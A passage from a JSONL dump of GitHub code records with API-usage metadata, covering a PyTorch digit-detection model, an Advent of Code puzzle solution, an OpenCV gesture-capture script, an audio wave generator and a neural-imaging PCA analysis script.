"usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 111, "usage_type": "call"}, {"api_name": "utils.write_pickle", "line_number": 128, "usage_type": "call"}]}
+{"seq_id": "4067216029", "text": "import torch.nn as nn\nfrom typing import List\nfrom canvas import MnistBox, MnistCanvas\nimport torch\n\n\nANCHOR_SIZES = [16,19]\n\n#backbone\nclass NetConv(nn.Module):\n def __init__(self):\n super(NetConv, self).__init__()\n modules = []\n\n modules.append(nn.Conv2d(1, 16, 3, padding=1))\n #modules.append(nn.BatchNorm2d(16))\n modules.append(nn.ReLU())\n modules.append(nn.MaxPool2d(2))\n\n modules.append(nn.Conv2d(16, 256, 3, padding=1))\n #modules.append(nn.BatchNorm2d(256))\n modules.append(nn.ReLU())\n modules.append(nn.MaxPool2d(2))\n\n self.layers = nn.Sequential(*modules)\n\n def forward(self, x):\n x = self.layers(x)\n\n return x\n\nimport torch.nn as nn\n\n\nclass Reshape(nn.Module):\n def __init__(self, *args):\n super(Reshape, self).__init__()\n self.shape = args\n\n def forward(self, x):\n return x.view((x.shape[0],) + self.shape)\n\nclass ClassificationHead(nn.Module):\n def __init__(self, anchors_numbers):\n super(ClassificationHead, self).__init__()\n modules = nn.ModuleList()\n #modules.append(nn.Flatten())\n #modules.append(nn.Linear(32*32*50, anchors_number*10))\n #(batch_size, in_channels= 256, 32, 32)\n per_pixel = 1\n modules.append(nn.Conv2d(in_channels=256, out_channels=(per_pixel*10), kernel_size=1))\n #(1, 961*10, 32, 32)\n #modules.append(Reshape(anchors_number,10))\n #modules.append(nn.Softmax(dim=2))\n\n\n self.layers = nn.Sequential(*modules)\n\n def forward(self, x):\n x = self.layers(x)\n #(1, 961*10, 32, 32)\n x = x.permute(0,2,3,1)\n #(1, 32, 32, 961*10)\n x = x.reshape(-1, 10) \n #(1*32*32*961, 10)\n return x\n\nclass BoxRegressionHead(nn.Module):\n def __init__(self, anchors_numbers):\n super(BoxRegressionHead, self).__init__()\n modules = nn.ModuleList()\n #modules.append(nn.Flatten())\n #modules.append(nn.Linear(32*32*50, anchors_numbers*4))\n per_pixel = 1\n modules.append(nn.Conv2d(in_channels=256, out_channels=per_pixel*4, kernel_size=1))\n #modules.append(Reshape(anchors_numbers, 4))\n self.layers = nn.Sequential(*modules)\n\n def forward(self, x):\n x = self.layers(x)\n #1, filters, 16, 16 = batch_size x liczba x wysoksoc x szeroksoc\n x = x.permute(0, 2, 3, 1)\n #batch_size x wysokoscx szerokosc x liczba_kanalow\n x = x.reshape(-1, 4) # [batch_size x wysoksoc x szeroksoc x liczba_anchorow(15)], 4\n\n return x\n\nclass DigitDetectionModelOutput:\n\n def __init__(\n self,\n anchors: List[MnistBox],\n classification_output: torch.Tensor,\n box_regression_output: torch.Tensor,\n ):\n self.anchors = anchors\n self.classification_output = classification_output\n self.box_regression_output = box_regression_output\n\n\nclass DigitDetectionModel(torch.nn.Module):\n # Should use ANCORS_SIZES\n anchors = []\n def __init__(\n self,\n ):\n super().__init__()\n self.netconv = NetConv()\n self.classification_target = ClassificationHead(10)\n self.box_regression_output = BoxRegressionHead(10)\n for n in range(0, 128//4):\n for m in range(0, 128//4):\n self.anchors.append(MnistBox(m*4 - ANCHOR_SIZES[0]/2, n*4 - ANCHOR_SIZES[1]/2, m*4 + ANCHOR_SIZES[1]/2, n*4+ANCHOR_SIZES[0]/2))\n\n def forward(self, x: MnistCanvas) -> DigitDetectionModelOutput:\n out = self.netconv(x)\n classification_target = self.classification_target(out)\n box_regression_output = self.box_regression_output(out)\n return DigitDetectionModelOutput(self.anchors, classification_target, box_regression_output)\n\n", "repo_name": "matematyk/deep-learning-second-assigment", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 
3771, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 92, "usage_type": "name"}, {"api_name": "canvas.MnistBox", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 93, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "attribute"}, {"api_name": "canvas.MnistBox", "line_number": 113, "usage_type": "call"}, {"api_name": "canvas.MnistCanvas", "line_number": 115, "usage_type": "name"}]}
+{"seq_id": "40702920521", "text": "\"\"\" Solution to day 08\n\nLessons from the problem:\n- frozenset saves lifes in unordered pattern matching\n\"\"\"\n\nimport os\nfrom typing import Dict, List, Tuple\n\nfrom aoc2021.utils import measure_time, print_results\n\nDATA_PATH = os.path.join(os.path.dirname(__file__), \"..\", \"data\")\n\n\nSEVEN_SEG_MAP = {\n frozenset(\"abcefg\"): 0,\n frozenset(\"cf\"): 1,\n frozenset(\"acdeg\"): 2,\n frozenset(\"acdfg\"): 3,\n frozenset(\"bcdf\"): 4,\n frozenset(\"abdfg\"): 5,\n frozenset(\"abdefg\"): 6,\n frozenset(\"acf\"): 7,\n frozenset(\"abcdefg\"): 8,\n frozenset(\"abcdfg\"): 9\n}\n\n\ndef count_1_4_7_8(data_list: List[str]) -> int:\n \"\"\" Counts the substrings with specific lengths corresponding to the digits above \"\"\"\n count = 0\n for data in data_list:\n substrings = data.split(\" \")\n for substring in substrings:\n if len(substring) in (2, 3, 4, 7):\n count += 1\n return count\n\n\ndef get_decoding(context: str) -> Dict[str, str]:\n \"\"\" Returns a dictionary with the segment correspondence, given the context (e.g. a -> g) \"\"\"\n all_chars = ('a', 'b', 'c', 'd', 'e', 'f', 'g')\n char_count = {char: 0 for char in all_chars}\n substrings = context.split(\" \")\n for substring in substrings:\n if len(substring) == 2:\n digit_1 = set(substring)\n if len(substring) == 3:\n digit_7 = set(substring)\n if len(substring) == 4:\n digit_4 = set(substring)\n for char in substring:\n char_count[char] += 1\n rev_char_count: Dict[int, set] = {rev_count: set() for rev_count in range(7)}\n for char, count in char_count.items():\n rev_char_count[10 - count].add(char)\n assert len(rev_char_count[4]) == len(rev_char_count[6]) == len(rev_char_count[1]) == 1\n\n encodings = {}\n encodings[\"a\"] = list(digit_7 - digit_1)[0]\n encodings[\"b\"] = list(rev_char_count[4])[0]\n encodings[\"e\"] = list(rev_char_count[6])[0]\n encodings[\"f\"] = list(rev_char_count[1])[0]\n\n encodings[\"c\"] = list(rev_char_count[2] - set(encodings[\"a\"]))[0]\n encodings[\"d\"] = list(digit_4 - {v for k, v in encodings.items() if k in (\"b\", \"c\", \"f\")})[0]\n encodings[\"g\"] = list(rev_char_count[3] - set(encodings[\"d\"]))[0]\n\n decoding_map = {v: k for k, v in encodings.items()}\n assert len(decoding_map) == 7\n assert len(set(decoding_map.keys())) == 7\n assert len(set(decoding_map.values())) == 7\n return decoding_map\n\n\ndef apply_decoding(substrings: List[str], decoding_map: Dict[str, str]) -> List[str]:\n \"\"\" Applies decoding on the data \"\"\"\n decoded_substrings = []\n for substring in substrings:\n decoded_substrings.append(\"\".join([decoding_map[char] for char in substring]))\n return decoded_substrings\n\n\ndef sum_decoded_data(data_list: List[str], context_list: List[str]) -> int:\n \"\"\" Decodes using the context and accumulates the numbers in the data \"\"\"\n all_ints = []\n for data, context in zip(data_list, context_list):\n decoding_map = get_decoding(context)\n substrings = data.split(\" \")\n decoded_substrings = apply_decoding(substrings, decoding_map)\n int_sequence = []\n for substring in decoded_substrings:\n int_sequence.append(SEVEN_SEG_MAP[frozenset(substring)])\n all_ints.append(sum(digit*(10**idx) for idx, digit in enumerate(int_sequence[::-1])))\n return sum(all_ints)\n\n\n@measure_time\ndef get_solution() -> Tuple[int, int]:\n \"\"\" Solution to the problem \"\"\"\n context_list = []\n data_list = []\n with open(os.path.join(DATA_PATH, \"day_08.txt\")) as input_file:\n for line in input_file:\n line = line.rstrip('\\n')\n input_data = 
line.split(\" | \")\n context_list.append(input_data[0])\n data_list.append(input_data[1])\n\n problem_1 = count_1_4_7_8(data_list)\n problem_2 = sum_decoded_data(data_list, context_list)\n return problem_1, problem_2\n\n\nif __name__ == \"__main__\":\n problem_1, problem_2, duration = get_solution()\n print_results(problem_1, problem_2, duration)\n", "repo_name": "gante/aoc2021", "sub_path": "bin/day_08.py", "file_name": "day_08.py", "file_ext": "py", "file_size_in_byte": 4040, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 84, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "aoc2021.utils.measure_time", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 99, "usage_type": "name"}, {"api_name": "aoc2021.utils.print_results", "line_number": 117, "usage_type": "call"}]}
+{"seq_id": "7102098411", "text": "import cv2\nimport numpy as np\nimport os\nimport time, math\n# import label_image as labelImg\nfrom subprocess import call\n\nfrom keras.models import load_model\nminValue = 70\n\nx0 = 400\ny0 = 200\nheight = 600\nwidth = 600\nkernel = np.ones((15,15),np.uint8)\nkernel2 = np.ones((1,1),np.uint8)\nskinkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))\ncount = 0\nlow_range = np.array([0, 50, 80])\nupper_range = np.array([30, 200, 255])\n\ncounter = 0\ncap = cv2.VideoCapture(0) \n\nwhile True:\n ret, frame = cap.read()\n\n cv2.imshow('frame', frame)\n\n cv2.rectangle(frame, (x0,y0),(x0+width,y0+height),(0,255,0),1)\n roi = frame[y0:y0+height, x0:x0+width]\n \n hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)\n \n #Apply skin color range\n mask = cv2.inRange(hsv, low_range, upper_range)\n \n # mask = cv2.erode(mask, skinkernel, iterations = 1)\n mask = cv2.dilate(mask, skinkernel, iterations = 1)\n \n #blur\n mask1 = cv2.GaussianBlur(mask, (15,15), 1)\n cv2.imshow(\"Blur\", mask1)\n\n #bitwise and mask original frame\n res = cv2.bitwise_and(roi, roi, mask = mask1)\n # color to grayscale\n res = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)\n cv2.imshow('res',res)\n\n # time.sleep(2)\n\n \n \n cv2.imwrite(os.path.join('scripts/test',\"frame{:d}.jpg\".format(count)), res) \n\n # print(labelImg.func())\n if counter%50==0:\n os.system(\"python -m scripts.label_image --image=scripts/test/frame0.jpg\")\n #print(result)\n k = cv2.waitKey(5) & 0xFF\n counter+=1\n if k==27:\n break\n\n\ncap.release()\ncv2.destroyAllWindows() \n", "repo_name": "arindam-modak/Gest.ly", "sub_path": "open-cv.py", "file_name": "open-cv.py", "file_ext": "py", "file_size_in_byte": 1580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.ones", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.getStructuringElement", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.MORPH_ELLIPSE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.dilate", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, 
"usage_type": "attribute"}, {"api_name": "os.system", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "32267266129", "text": "import numpy as np\nimport soundfile as sf\nimport sounddevice as sd\nimport matplotlib.pyplot as plt\n\nclass Wave():\n \n def __init__(self, freq, duration, wave_type = 'empty'):\n self.fs = 44100\n self.freq = freq\n self.time = duration\n self.time_vector = np.linspace(0, self.time, round(self.fs*self.time))\n self.wave = np.zeros_like(self.time_vector)\n self.wave_type = wave_type\n if wave_type == 'sine':\n self.sine()\n elif wave_type == 'square':\n self.square()\n elif wave_type == 'triangle':\n self.triangle()\n elif wave_type == 'sawtooth':\n self.sawtooth()\n \n def sine(self):\n self.wave = 0.5*np.sin(2*np.pi*self.freq*self.time_vector)\n self.wave_type = 'sine'\n \n def square(self):\n half_cycle = round(self.fs/(2* self.freq))\n self.wave = np.hstack((np.ones(half_cycle),(-1)*np.ones(half_cycle)))\n while len(self.wave) <= round(self.time*self.fs):\n cycle = np.hstack((np.ones(half_cycle),(-1)*np.ones(half_cycle)))\n self.wave = np.hstack((self.wave, cycle))\n self.wave = self.wave[:round(self.time*self.fs)]\n \n def triangle(self, harmonics = 10):\n series = np.zeros_like(self.time_vector)\n for i in range(0, harmonics):\n n = (2*i)+1\n arg = 2 * np.pi * self.freq * n\n series += (((-1)**i)*np.sin(arg*self.time_vector))/(n**2)\n self.wave = (8/(np.pi**2)) * series\n \n def sawtooth(self, harmonics = 100):\n series = np.zeros_like(self.time_vector)\n for k in range(1, harmonics):\n arg = 2 * np.pi * self.freq * k\n series += (((-1)**k)*np.sin(arg*self.time_vector))/k\n self.wave = (1/2) - (1/np.pi) * series\n \n def samplerate(self, fs):\n \n if type(fs) != int:\n if type(fs) == float:\n raise TypeError('Please input an integer.')\n else: \n raise TypeError('Please input a valid number.')\n \n if fs < 0:\n raise ValueError('''Frequency must be a positive integer.''')\n \n elif self.freq*2 <= fs:\n self.fs = fs\n \n else: \n raise ValueError('''Frequency value must be two times the\n samplerate due to the Nyquist Theorem.''')\n \n def play(self):\n sd.play(self.wave,self.fs)\n \n def save(self):\n sf.write('wave.wav', self.wave, self.fs)\n \n def plot(self):\n plt.plot(self.time_vector, self.wave)\n plt.xlim(0, 0.02)\n plt.ylim(-1, 1)\n \n \n#------------------------------------TEST------------------------------------#\n\n# freq = 100\n# time = 2\n# wave_type = 'sawtooth'\n# test = Wave(freq, time, wave_type)\n# plt.plot(test.time_vector, test.wave)\n# plt.xlim(0, 0.02)\n\n\n\n \n", "repo_name": "reborafs/py_wave_gen", "sub_path": "wave_class.py", "file_name": "wave_class.py", "file_ext": "py", "file_size_in_byte": 2962, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.linspace", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.sin", 
"line_number": 41, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sounddevice.play", "line_number": 70, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}]}
+{"seq_id": "75056266329", "text": "# %%\nfrom IPython import get_ipython;\n\nget_ipython().magic('reset -sf')\n\n# %% imports\nimport os\nimport numpy as np\nimport pandas as pd\nimport more_itertools as it\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport xlsxwriter\nfrom sklearn.decomposition import PCA\n\n\n# %%\n\n# custom functions\ndef get_baseline(signal, window, percentile):\n baseline = []\n\n for window_data in it.windowed(signal.T, n=window, step=1):\n base = np.percentile(np.array(window_data), percentile, axis=0)\n baseline.append(base)\n\n return np.array(baseline).T\n\n\ndef crop_to_window(signal, window):\n \"\"\"\n Returns signal without half window at the begining and half window at the end.\n Crops along 0 dimention!!!!\n\n :param signal: signal to crop\n :param window: sliidng window size\n :return: cropped signal\n \"\"\"\n half_window = np.floor(window / 2).astype(int)\n crop_sig = signal[half_window:-half_window]\n\n return crop_sig\n\n\ndef get_dff(signal, baseline=None):\n if baseline is None:\n window = 21\n percentile = 8\n baseline = get_baseline(signal, window, percentile)\n signal = crop_to_window(signal.T, window).T\n\n return (signal - baseline) / baseline\n\n\ndef get_stim(stim_pattern, stim_len):\n \"\"\"\n Returns np.array of int : stimuli label for the current state.\n Assuming b1>1>b2>3\n\n :param stim_pattern: the pattern to repeat\n :param stim_len: stimulus length\n :return: array of indices : 0 for b1 , 1 for 1 dot, 2 for b2 and 3 to 3 points.\n \"\"\"\n stim_cycle = len(stim_pattern)\n\n # can modify here to start at any point\n stimulus = (stim_pattern * int(np.ceil(stim_len / stim_cycle)))[0:stim_len]\n stimulus = [int(x) for x in stimulus]\n return np.array(stimulus)\n\n\n# %% load extracted signals\ninput_folder = 'D:/Code/repos/numerosity/Anna_20200717/all_neurons/fish1'\nfish_name = 'fish1'\ninput_file = f'{input_folder}/{fish_name}_signals_diam2_NxT.csv'\nsignal = np.loadtxt(input_file, delimiter=',', dtype=float)\n\nprint(f'N cells : {len(signal)}')\nX = signal\n# %% Preprocess for PCA\ndff = get_dff(signal)\nprint(f'dff shape : {dff.shape}')\nX = dff.T\n# %%\npca = PCA(n_components=100)\npca.fit(X)\n\nplt.plot((pca.explained_variance_ / np.sum(pca.explained_variance_)) * 100)\nplt.xlabel('PC')\nplt.ylabel('% var. 
explained')\nplt.xlim([0, 10])\nplt.show()\n\n# %%\nX_pca = pca.transform(X)\n# %%\nplt.subplot(2, 2, 1)\nplt.plot(X_pca[:, 0], X_pca[:, 1], '.')\nplt.xlabel('PC 1')\nplt.ylabel('PC 2')\n\nplt.subplot(2, 2, 2)\nplt.plot(X_pca[:, 0], X_pca[:, 2], '.')\nplt.xlabel('PC 1')\nplt.ylabel('PC 3')\n\nplt.subplot(2, 2, 3)\nplt.plot(X_pca[:, 1], X_pca[:, 2], '.')\nplt.xlabel('PC 2')\nplt.ylabel('PC 3')\n\nplt.subplot(2, 2, 4)\nplt.plot(X_pca[:, 1], X_pca[:, 3], '.')\nplt.xlabel('PC 2')\nplt.ylabel('PC 4')\nplt.show()\n\n# %%\nPC1_neg = X_pca[0, :] < 0\nPC1_pos = X_pca[0, :] > 0\nprint(f'num positive : {np.sum(PC1_pos)}, num negative : {np.sum(PC1_neg)}')\n# %%\nPC1_temporal = np.mean(X * X_pca[:, [0]], axis=0)\nplt.plot(PC1_temporal)\nplt.ylabel('I, a.u.')\nplt.xlabel('time')\nplt.title('PC1')\nplt.show()\n# %%\nPC1_temporal = np.mean(X * X_pca[:, [1]], axis=0)\nplt.plot(PC1_temporal)\nplt.ylabel('I, a.u.')\nplt.xlabel('time')\nplt.title('PC2')\nplt.xlim([750, 800])\nplt.show()\n\n# %%\n# %% Generate stimulus pattern\nwindow = 21\npercentile = 8\nstim_pattern = '00000111112222233333'\nstimulus = get_stim(stim_pattern, signal.shape[1])\ncrop_stim = crop_to_window(stimulus, window)\n# %% plot box-plots for DFF\n\nblank1 = dff[:, crop_stim == 0]\ndot1 = dff[:, crop_stim == 1]\nblank2 = dff[:, crop_stim == 2]\ndot3 = dff[:, crop_stim == 3]\n# %%\nneurons = PC1_neg\n\nall_arr = [np.mean(blank1[neurons, :], axis=1),\n np.mean(dot1[neurons, :], axis=1),\n np.mean(blank2[neurons, :], axis=1),\n np.mean(dot3[neurons, :], axis=1)]\n\nsns.boxplot(data=all_arr)\nplt.xticks([0, 1, 2, 3], ['blank 1', '1 dot', 'blank 1', '3 dots'])\nplt.ylabel('dF/F')\nplt.title(f'{fish_name}, sld.w {window}, prct. {percentile}')\n\n# plt.savefig(f'{input_folder}/{fish_name}_boxplot_dff.png')\nplt.show()\n\n# %%\n# %%\npc1 = 6\npc2 = 5\n\nstim1 = X_pca[crop_stim == 0, :]\nstim2 = X_pca[crop_stim == 1, :]\nstim12 = X_pca[crop_stim < 2, :]\n\nplt.plot(stim1[:, pc1], stim1[:, pc2], '.b')\nplt.plot(stim2[:, pc1], stim2[:, pc2], '.r')\n\n# plt.plot(stim12[:, pc1], stim12[:, pc2], 'k',linewidth=0.2)\n\nplt.xlabel(f'PC {pc1}')\nplt.ylabel(f'PC {pc2}')\nplt.legend(['blank 1', 'dot 1'])\nplt.title('PCA on Brain states')\nplt.show()\n# %%\nsns.distplot(pca.components_[pc2, :])\nplt.show()\n# %%\n\n", "repo_name": "LemonJust/numerosity", "sub_path": "explore_data.py", "file_name": "explore_data.py", "file_ext": "py", "file_size_in_byte": 4524, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "IPython.get_ipython", "line_number": 4, "usage_type": "call"}, {"api_name": "more_itertools.windowed", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 77, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 89, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.xlabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": 